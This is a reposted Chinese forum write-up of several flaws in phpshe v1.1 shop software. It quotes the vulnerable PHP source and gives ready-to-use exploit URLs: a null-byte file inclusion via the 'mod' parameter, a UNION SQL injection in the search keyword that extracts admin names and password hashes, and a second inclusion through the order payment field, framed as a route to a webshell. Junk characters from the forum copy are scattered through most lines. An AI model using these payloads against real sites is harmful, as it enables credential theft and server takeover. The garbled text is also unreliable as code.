中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/; u' l( S# l: @  Y5 g" i& c
/* Phpshe v1.1 Vulnerability# U+ W: D6 M0 ?) r5 p
/* ========================& t4 D: U$ e' k  \
/* By: : Kn1f37 I( t9 k& O/ f& f" `: ^4 g
/* E-Mail : 681796@qq.com
4 ?+ S# }, Z8 r, `* J; l9 C/*******************************************************/
1 t3 m4 k. X5 f3 n0×00 整体大概参数传输
2 N, @3 J9 c+ J7 Y : Z: m/ I9 n" N. r

5 `+ |9 W& J1 T: I5 M$ H3 Z
0 ~5 E: |# l9 z! I( J7 \//common.php
  T' B3 b) w  k# _$ u" Z1 |if (get_magic_quotes_gpc()) {- y. M: Y; h8 L- a. z0 A
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');5 @/ k* X  C6 A2 v& f
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');* P2 z7 o/ d& K( D% V9 w  x1 A
}9 v; ~  k, }) m! Z+ z9 B
else {+ o8 K7 X% B5 n& Q+ p* c* U, V) [
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
- d. S9 s6 t4 x2 |# c, H!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
; A, j+ v) L) R+ ~) D. T9 |}
1 k; m! D1 P: g+ T/ wsession_start();( {+ x% e/ x/ {: a7 K- O7 ^
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');  h, b# z( [* |* ]
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');! g2 M# c' t, S: Q: w
! J/ ]; {  k4 m
0×01 包含漏洞, p, j9 B% d) M
, H* h* p. l* B, P! A' ~; ?( |) u

% W) b! T" g! `7 J5 ^//首页文件
" M3 N9 C+ q: \/ U/ r7 ?<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);, i6 o: I% R& ]. v: _5 w. C
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
8 c4 m+ g$ K& c; Ipe_result();
$ a) X5 k/ R* f- W8 y?>
' Z4 {4 d0 X" E, c7 \8 e, B  e//common 文件 第15行开始
! C. M2 b  E. P$ u6 N7 m9 W7 surl路由配置
5 K4 x, I. ^6 I9 l% O$module = $mod = $act = 'index';4 E' P+ A- G& r( h: n
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
# e3 y& [* S  W- S+ Z4 {: i. ~$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
4 n- G; [/ {5 K: F9 M) }$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
6 Y6 G$ p: C, l5 B! O- @6 r//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
; A4 r8 f) e* @0 G" f4 t


  p( \$ J" {# ~" @" b% v0 ^( x   i6 m9 @2 L( j; A# ]" x1 E, [
0×02 搜索注入" x' e2 t! q! \: N& R
& s5 s8 D6 w4 _1 o2 H
<code id="code2">

//product.php文件) H& r6 u+ R) E
case 'list':  V) S/ x: d$ j5 m
$category_id = intval($id);
3 Z( W# S$ u# v* |. |# e$info = $db->pe_select('category', array('category_id'=>$category_id));% |* Q' Z: P/ s/ L
//搜索
$ e5 _1 [% m* v  W$sqlwhere = " and `product_state` = 1";% H7 X( [) U% U6 M/ y& ]  r
pe_lead('hook/category.hook.php');
8 Y% D9 C2 ?9 b1 {( A- Hif ($category_id) {
! F+ K  e' a( g% a' jwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
. F5 s: K1 v! ?: ]}! N) I6 {& ]$ c3 r* \, I
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
! x: F% V6 s# l% [: O8 cif ($_g_orderby) {
: k+ a( q, l' P. D$orderby = explode('_', $_g_orderby);/ s0 b/ X1 e0 C  V! p
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";0 c' M) I  Z# g' Z0 J0 n/ @; d
}& j1 `% n- x9 E* v* _
else {
: X, ]6 q4 {- R5 C' \0 }$sqlwhere .= " order by `product_id` desc";
* M2 k, k% O, g! _}* `1 _  G2 X3 e9 p( U$ w" @$ x) V
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
  G$ n; [" M, b( a4 [- `* ~2 D//热卖排行
, I! `5 _. M3 F4 |  \$product_hotlist = product_hotlist();$ E2 h$ G. }& ?9 M" s3 e3 Q# e2 R" H
//当前路径
# e% \# o- K0 P. ~" q; e( k$nowpath = category_path($category_id);" |0 O- m) ?* R- Q; _
$seo = pe_seo($info['category_name']);
6 `) H8 Z, M# L) Y& I9 qinclude(pe_tpl('product_list.html'));
7 h* @; D2 h8 P//跟进selectall函数库' `% v& o0 S5 c& D  H, W* ^/ I
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())7 B* j4 A3 ~" o5 T
{$ V; H6 u" G" c( h6 b9 ^
//处理条件语句3 o/ L& ^- u7 n- ~: A. Z
$sqlwhere = $this->_dowhere($where);- I5 m; C6 a: a! T7 i+ R7 C) _
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
! U9 u7 a! S' _1 T! d7 s}
7 c0 h' y- E: C1 m//exp( V- m7 C) S  \
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
# a5 i, C+ }; K- s

</code>& F" o2 ^6 \3 e% c4 H) I
4 ]/ m" b- m* S# v1 n3 g3 o& q
0×03 包含漏洞2
  Q! A6 v" @0 {" Y, E* `0 ]6 O
' R, C5 l# C7 c9 H<code id="code3">

//order.php

case 'pay':

/ G& C2 ]% K  Z, K0 W* k
$order_id = pe_dbhold($_g_id);


) y# o' }! P& _. V1 i$cache_payway = cache::get('payway');

$ v+ q. K  u% v. v) X! r
foreach($cache_payway as $k => $v) {


6 P5 z/ R/ R3 `6 u$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


* b5 H+ g6 _" o* v+ l& J1 A: Jif ($k == 'bank') {


5 [, j6 s) h6 P' h3 Y. z$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


* k/ z6 t. I8 F$ X) r2 [}


# i  T& N  ?' K8 `) r+ x0 Y& q}

% p4 g8 t3 v3 i# R8 F
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

- x* L( M1 O3 l. R
!$order['order_id'] && pe_error('订单号错误...');

8 a8 b+ P& \$ W/ \. z0 n9 A
if (isset($_p_pesubmit)) {

8 ?0 c, d. V$ W0 a
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


7 |  q+ B4 s: A$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

4 f' O0 Y( q$ t, g, i) Q3 g
foreach ($info_list as $v) {

+ `  _8 g1 J8 u& Y+ V) I8 i1 g* d
$order['order_name'] .= "{$v['product_name']};";
5 @& `6 D" d6 v3 d) f% H+ F


& }4 N5 k! I3 D: }}

5 a$ `+ @# S3 S- _6 m
echo '正在为您连接支付网站,请稍后...';

; I, F7 Y0 X4 o1 L3 ~
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


: [9 z' Z2 y- W) J; e3 \; j; c}//当一切准备好的时候就可以进行"鸡肋包含了"

& K6 r! `3 _, t
else {

( G7 o7 o  M" ?' C& Y+ K! z- l# N
pe_error('支付错误...');

6 l/ H0 u$ v$ k
}

# C( w' J6 `3 f' Q9 U
}


- m' O' g, N1 l. d6 Y" F$seo = pe_seo('选择支付方式');


+ `; G* T4 ~. w- G- h  ?, Ninclude(pe_tpl('order_pay.html'));

1 d$ [8 q) N& ~$ u8 q+ V* N
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
8 x6 q) s% h1 D# u$ @6 e6 G



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2